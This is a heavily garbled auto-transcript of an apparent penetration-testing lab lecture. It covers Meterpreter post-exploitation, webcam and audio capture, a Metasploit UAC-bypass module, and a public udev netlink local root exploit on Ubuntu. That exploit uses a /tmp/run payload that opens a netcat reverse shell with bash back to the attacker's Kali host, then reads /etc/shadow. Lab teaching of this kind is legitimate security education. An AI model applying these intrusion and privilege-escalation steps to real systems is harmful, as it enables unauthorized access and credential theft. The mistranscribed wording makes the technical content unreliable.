we're in. Addition, post exploitation. I have some open sessions.
I have a mature earlier on X p
now systems. We used that emissary ater 67
I have just a regular admin user on 17 on and on the bunch. Do I have that S S h. So I am the user, Georgia, which is a suit to wear. But I don't have George's password, so I can't cto
All right, so let's just jump into one of the sessions I was jumped into the x p.
I do help. Wouldn't see our municipally interpreter commands. So we've seen, like, has don't previously.
You, like, take a picture from Web cams, record audio, things like that
and also have, like, upload and download. We can upload like
your share window's fine Aires
and that cat that you actually put it on the c drive.
You mean no such file in your directory?
Those windows. So does Brian. Aged There, you
likewise you Condell a toe. See some more options of how we can do file transfer early in the next video.
In the sections are we've seen t ftp we've seen neck out,
but We have a couple other options for file transfer
when we don't have an interactive shell. But Interpreter does really easy of living download
pulling files to and from
the system. We also have interpreter scripts. I've heard the interpreter grip. They're supposed to be phased out, and everything's supposed to turn into a post exploitation model. But, you know, there's still interpretive scripts right now, so, uh,
minus 12 issues them. I don't know if I'm getting accurate information.
I don't know if it's true or not. So if we go to interpreter scripts, you're just Ruby scripts that could be run in the material for your session.
For instance, was runs with a run and in the script name, get gooey,
give us health options. If necessary.
We could do dash you to enable only we already have a username. And positive word
ran this when I reported the video the first time, so it's obviously gonna work there, he said.
It creates a cleanup script. So we didn't see RC files in this
class. I don't think, but they're just basically scripts for menace. Boy. No special syntax required. It's just one command per line.
All right, so I encourage you to spend time trying out the different scripts. Different commands of Give you examples here.
Now let's get post exploitation modules. So that's what the mature British scripts are apparently going to turn into. You can run the post exploitation module directly from an open session
like that, but I prefer to do him this way too posed
and let's see. What example do I want to use?
Newme logged on users.
We sure options here.
My session again. It's set from when I did this previously, sir.
That's that Session force appeared against my window. Seven system
on and these don't have payloads. They just need to be told the active session. You want to run it against the know our host l host anything like that.
There are current logged in user
users who've coming as well. It's like Administrator
like that. We have had some previous users law again, but currently answers may
that's an example of a post. Exploitation modules are kind of like auxiliaries, except it's run on in open session.
We also have local exploits that
we'll work on a current session so we actually see that next.
privilege escalations over it of sessions
and start position one for you. Get you? I d on it.
Well, I already migrated. Position was open. That should say system. But if we do,
Pete just ups and move into another process outside of our server for system
where we did her emissary to 67 we saw this in our client sides. We could move into another one and become
regular user. Georgia. Georgia is a local admen there. She'll have some privileges.
well, next pee. That should be pretty simple. To do that, we can become systems of the runs,
little privilege escalation techniques.
our client side attacks or even our network based attacks. It could be some vulnerability locally on our windows or lank systems. There's also because the local exploits so
going to be exploration and windows on local
and one that we could try in
so certainly are yet system doesn't have every possible
local put privilege escalation exploit so we can try additional ones.
Probably already sent my options here. Indeed I did. So you want to set session again? Just set session to one
exploit. So what's interesting about these areas are already running a system. Yeah, that would stop it. You need to move back to being Georgia.
what's interesting about these is that rather than taking the open session and escalating it to system the way get system does well actually run a payload.
you didn't actually see one set here from where I already ran this one. When I made the video without sound
on, they were created. New session of systems. You'll still have the original session, so that could be a little bit conceiving. Get system just escalates. The one that you have,
I would do seven to get you ready. Why me? But he would get system. It actually isn't going to work.
Lost because of something called you a see. It certainly is possible that they could be patched and have the
global setting set to the point that you can't privilege escalate. But typically that's not going to be the case, right? I mean, if you got this far on a system chances are there are some vulnerabilities lying around.
So with Windows seven on Oliver, other newer Windows operating systems You've probably seen you a see it comes up and says, Do you want to allow this program to make changes? And you know, you have to run things as administrator even though you're an administrative user.
If you want to sit up or start up the command line and you want to run privilege things, you have the right click and you run as administrator,
which was not the case on experience
that makes it a little bit harder to do things like this.
Packers came up with ways to stop this. So there is a model
for bypassing U. S. A.
There's exploit windows level by vast USC,
and it does run a payload on. We need to set. The sessions are again. Are you said it? The floors do set session
and you can sort of the payload or live in default.
You need to be a local admen for this to work.
I already did. This wants it may actually
All right. I guess it doesn't want to do it twice. That's
I don't have the anti virus on you do after
essentially of the anti virus off. Some of this stuff the work.
But it definitely worked from her, Did it? Chicken two girls.
So what you can do is run this bypassed us. See, it will open a new session to interact with that new session. You're still going to be the regular user, but then if you do and get system, it will work because we bypassed us. Cease little, no honor. Block it. So you should be able to get system.
All right, we're gonna try something a little bit different on our 12 system.
So we are the use of Georgia who is a suitor. But we don't have our password to do our suit doing.
We're gonna take a look at using a public exploit from exploit database.
We do have exploit data ways locally on our Callie system and use your share exploit devi
so we can use w get to pull things down if we just put him on our web servers Are online access really eating you to do our
so we can get some information about this guy so we can do it. Let's be underscore. Released.
a So this is a bunch of 8.10. Intrepid is a bit out of date. Bigger ones also have vulnerabilities. Looking some classes age 11 point has
vulnerability as well.
I generally keep up with these because
I do android exploitation. So a lot of the same ones that come up in Android come up in Lenox proper since it is
some changes of the fork.
So the one we're gonna do here came up in Android as well is the 1 11.10
So we can also get information about the Colonel
What we do some searching
this version of the bunch. You does have a vulnerability in the Udo model.
I always have to look this up. It's like something about Ugo.
This is a very specific. So let's see
I could probably haven't seen
it's not done. We are their version.
So beautif Evan tells us the version of you tive is 1 24 and anything.
And then there's died
and anything that is
1 40 or earlier believe does have an issue. It is a logic issue, so it's not memory corruption, which makes it nice
for working with the exploit. We don't have to worry about switching out shell code or anything like that.
We're actually gonna do this one that see right here
looking cat platforms, Lennox
so there is no shell code, basically is creating a Net link message and sending it.
Who had explained appear? Another reason I like this example is it does explain how to use it and what's going on.
Those Udo, before 1.4 point one, does not verify whether a net link message originates from Colonel Space, which allows local users to gain privileges by sending in that link message from user space.
So what that means basically is, Well, you don't have it basically loads device drivers like, for instance, when you plug in a USB, it will load up of the drivers. For that, they will run as roots or go to you Dev's job, basically so before 1.4 point one
one android and on the next proper
well you didn't have you down for the process. Work the same way
Basically, it allows if you send it the correct kind of message, which you can look up the specs and figure out how to send the correct kind of message. Even if you're not
the from Colonel Space, you can send it this message, and it will gladly run as root whatever code you tell it to you as though it was your device driver. So that's exactly what this exploit dozes creates
correct kind of message and sends it and says, Run this for me.
Does it tested on Intrepid? So that's what we have
on uses, says past the P I. D of the UT F D Net link socket just listed in Prague. Net Net link
and usually is the UT f d P i. D. Minus one as RV one, which in see that their first command line argument.
So we need to find some information to pass to it.
No says the exploit will execute temple run as route should throw whatever payload you want in there. A lot of your local privilege escalations will basically just take over the current process and just execute been badge and you'll be running his route in this case just because this is
logics law of the particular kind that it is
that it's just going to run code on your behalf as though it's a device driver going to have to be a little bit more
creative about it. My solution certainly isn't the only one, but it works. So you're welcome to try something else.
You just have to put something in temporal on
which we should have access to. Everybody should have access to Tamp.
All right, first things first. We need to find that p i d of you, Dave The Net link socket. It says it's listed in Prague. Net link.
Please read access to Wi do. Here's the P I. D's
1234 It looks like there's four of them. I'm not sure which one is this.
You have d net link socket.
Maybe I could try and figure out what the S K things are and figure it out, but I don't know enough about lax girls be able to tell you,
but it was me. Another hint. It's usually the you'd have d P I d minus one. I know how to find a process. I d
PSR grip you, Davey.
Like it might grow up itself. And here's Espen, you div di dusters. Damon
to 512 is its process. Eddie,
says it's usually the p i. D. If you have a D minus one. So this is 12. This is 11.
25 11. Looks right to may.
We also need to put something in that. Tim run those. Maybe our payload
Kansans. I already just recorded this. If I looked when I put there,
executed in her shell. So we need our house bang been bashed to tell these your bash commands.
Then I just do a net cat
i p address of Cali, which these did change. I tried really hard to keep them the same I p's throughout the entire class, which, as much as I travel has not been easy.
But I've finally failed. So choose you to to support and execute been bad show. We saw this same sort of thing in our
the next injury section.
I was just going to be our payload.
to catch it overhears or in a listen on Callie doing to you too.
So we need to do whatever you get. So while we need to copy it over already did Thio
cure Web servers running
and turn this back on?
fivesome cute upstate. W get makes it easy. It was already on there, so it made it a one. We do typically have GCC for compiling. See files
on Lennox, which is also nice.
8572 Don't see her out with Colin Exploit
exploits. And we created our temp run. So it's hard coded to run that for us.
25 11 of our argument.
So it looks like we got a connection over here that we don't have a prompt.
We do it. Who am I? I'm route
Kano and see Shadow. We got passports, badges. We sell those in password cracking already.
That's just a little intro to
local privilege escalation and using public exploits again, I encourage you to spend the time to read any public exploit, replace anything like Shell Co that you can't read.
Yes, You never really know
Otherwise, it doesn't really have the same oversight that we have on some of our others,